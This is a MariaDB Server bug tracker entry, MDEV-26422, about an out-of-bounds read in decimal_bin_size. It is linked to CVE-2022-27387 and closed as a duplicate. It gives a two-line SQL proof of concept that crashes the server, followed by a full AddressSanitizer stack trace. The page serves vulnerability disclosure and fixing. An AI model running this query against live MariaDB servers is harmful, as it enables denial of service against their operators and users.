Uploaded image for project: 'MariaDB Server'
  1. MariaDB Server
  2. MDEV-26422

ASAN: global-buffer-overflow in decimal_bin_size on SELECT

    XMLWordPrintable

Details

    • Bug
    • Status: Closed (View Workflow)
    • Major
    • Resolution: Duplicate
    • 10.6, 10.3(EOL), 10.4(EOL), 10.5(EOL), 10.7(EOL)
    • N/A
    • N/A
    • None
    • Linux version 5.13.0-1-MANJARO (builduser@LEGION) (gcc (GCC) 11.1.0, GNU ld (GNU Binutils) 2.36.1) #1 SMP PREEMPT Mon Jun 7 06:16:10 UTC 2021 x86_64

    Description

      PoC:

      CREATE TABLE v0 AS SELECT NULL AS v1 FROM DUAL ;
      		 
       SELECT 'x' FROM v0 GROUP BY v1 , v1 ORDER BY AVG ( from_unixtime ( '' ) ) ;

      ASAN report:

      ersion: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 10000  Source distribution
      		 
      =================================================================
      		 
      ==2869677==ERROR: AddressSanitizer: global-buffer-overflow on address 0x55fa8a50bf90 at pc 0x55fa89dcf30d bp 0x7fb3016d0290 sp 0x7fb3016d0280
      		 
      READ of size 4 at 0x55fa8a50bf90 thread T13
      		 
          #0 0x55fa89dcf30c in decimal_bin_size /experiment/mariadb-server/strings/decimal.c:1551
      		 
          #1 0x55fa88cd14d2 in my_decimal_get_binary_size(unsigned short, unsigned short) /experiment/mariadb-server/sql/my_decimal.h:346
      		 
          #2 0x55fa88cd14d2 in Type_handler_decimal_result::sort_length(THD*, Type_std_attributes const*, SORT_FIELD_ATTR*) const /experiment/mariadb-server/sql/filesort.cc:2182
      		 
          #3 0x55fa88cd9bbd in sortlength /experiment/mariadb-server/sql/filesort.cc:2258
      		 
          #4 0x55fa88cd9bbd in filesort(THD*, TABLE*, Filesort*, Filesort_tracker*, JOIN*, unsigned long long) /experiment/mariadb-server/sql/filesort.cc:251
      		 
          #5 0x55fa886c0698 in create_sort_index(THD*, JOIN*, st_join_table*, Filesort*) /experiment/mariadb-server/sql/sql_select.cc:24386
      		 
          #6 0x55fa886c10fe in st_join_table::sort_table() /experiment/mariadb-server/sql/sql_select.cc:22060
      		 
          #7 0x55fa886c1373 in join_init_read_record(st_join_table*) /experiment/mariadb-server/sql/sql_select.cc:21999
      		 
          #8 0x55fa886f3cce in AGGR_OP::end_send() /experiment/mariadb-server/sql/sql_select.cc:29470
      		 
          #9 0x55fa886f45cf in sub_select_postjoin_aggr(JOIN*, st_join_table*, bool) /experiment/mariadb-server/sql/sql_select.cc:20765
      		 
          #10 0x55fa8871882b in do_select /experiment/mariadb-server/sql/sql_select.cc:20604
      		 
          #11 0x55fa8871882b in JOIN::exec_inner() /experiment/mariadb-server/sql/sql_select.cc:4735
      		 
          #12 0x55fa8871a592 in JOIN::exec() /experiment/mariadb-server/sql/sql_select.cc:4513
      		 
          #13 0x55fa88712b5a in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /experiment/mariadb-server/sql/sql_select.cc:4991
      		 
          #14 0x55fa88714654 in handle_select(THD*, LEX*, select_result*, unsigned long) /experiment/mariadb-server/sql/sql_select.cc:545
      		 
          #15 0x55fa88557d7c in execute_sqlcom_select /experiment/mariadb-server/sql/sql_parse.cc:6256
      		 
          #16 0x55fa88581420 in mysql_execute_command(THD*, bool) /experiment/mariadb-server/sql/sql_parse.cc:3946
      		 
          #17 0x55fa885865a0 in mysql_parse(THD*, char*, unsigned int, Parser_state*) /experiment/mariadb-server/sql/sql_parse.cc:8030
      		 
          #18 0x55fa8858c60b in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /experiment/mariadb-server/sql/sql_parse.cc:1896
      		 
          #19 0x55fa8859173c in do_command(THD*, bool) /experiment/mariadb-server/sql/sql_parse.cc:1404
      		 
          #20 0x55fa8894ce56 in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1418
      		 
          #21 0x55fa8894d33c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
      		 
          #22 0x55fa893ddc2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
      		 
          #23 0x7fb32095f258 in start_thread (/usr/lib/libpthread.so.0+0x9258)
      		 
          #24 0x7fb32050a5e2 in __GI___clone (/usr/lib/libc.so.6+0xfe5e2)
      		 
       
      		 
      0x55fa8a50bf90 is located 16 bytes to the left of global variable 'dig2bytes' defined in '/experiment/mariadb-server/strings/decimal.c:132:18' (0x55fa8a50bfa0) of size 40
      		 
      0x55fa8a50bf90 is located 16 bytes to the right of global variable 'frac_max' defined in '/experiment/mariadb-server/strings/decimal.c:133:19' (0x55fa8a50bf60) of size 32
      		 
      SUMMARY: AddressSanitizer: global-buffer-overflow /experiment/mariadb-server/strings/decimal.c:1551 in decimal_bin_size
      		 
      Shadow bytes around the buggy address:
      		 
        0x0abfd14997a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
        0x0abfd14997b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
        0x0abfd14997c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
        0x0abfd14997d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
        0x0abfd14997e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
      =>0x0abfd14997f0: f9 f9[f9]f9 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
      		 
        0x0abfd1499800: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
      		 
        0x0abfd1499810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
        0x0abfd1499820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
        0x0abfd1499830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
        0x0abfd1499840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      		 
      Shadow byte legend (one shadow byte represents 8 application bytes):
      		 
        Addressable:           00
      		 
        Partially addressable: 01 02 03 04 05 06 07 
        Heap left redzone:       fa
      		 
        Freed heap region:       fd
      		 
        Stack left redzone:      f1
      		 
        Stack mid redzone:       f2
      		 
        Stack right redzone:     f3
      		 
        Stack after return:      f5
      		 
        Stack use after scope:   f8
      		 
        Global redzone:          f9
      		 
        Global init order:       f6
      		 
        Poisoned by user:        f7
      		 
        Container overflow:      fc
      		 
        Array cookie:            ac
      		 
        Intra object redzone:    bb
      		 
        ASan internal:           fe
      		 
        Left alloca redzone:     ca
      		 
        Right alloca redzone:    cb
      		 
        Shadow gap:              cc
      		 
      Thread T13 created by T0 here:
      		 
          #0 0x7fb320f92fa7 in __interceptor_pthread_create /build/gcc/src/gcc/libsanitizer/asan/asan_interceptors.cpp:216
      		 
          #1 0x55fa893ddea9 in my_thread_create /experiment/mariadb-server/storage/perfschema/my_thread.h:48
      		 
          #2 0x55fa893ddea9 in pfs_spawn_thread_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252
      		 
          #3 0x55fa8824eb3c in inline_mysql_thread_create /experiment/mariadb-server/include/mysql/psi/mysql_thread.h:1139
      		 
          #4 0x55fa8824eb3c in create_thread_to_handle_connection(CONNECT*) /experiment/mariadb-server/sql/mysqld.cc:5934
      		 
          #5 0x55fa8825a7b6 in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /experiment/mariadb-server/sql/mysqld.cc:6055
      		 
          #6 0x55fa8825b36f in handle_connections_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179
      		 
          #7 0x55fa8825ea52 in mysqld_main(int, char**) /experiment/mariadb-server/sql/mysqld.cc:5829
      		 
          #8 0x7fb320433b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
      		 
       
      		 
      ==2869677==ABORTING

      Attachments

        Issue Links

          duplicates

          Bug - A problem which impairs or prevents the functions of the product. MDEV-25317 Assertion `scale <= precision' failed in decimal_bin_size And Assertion `scale >= 0 && precision > 0 && scale <= precision' failed in decimal_bin_size_inline/decimal_bin_size

          • Blocker - Blocks development and/or testing work, production could not run.
          • Closed
          links to

          Web Link CVE-2022-27387

          Activity

            People

              Unassigned Unassigned
              yaoguang yaoguang
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: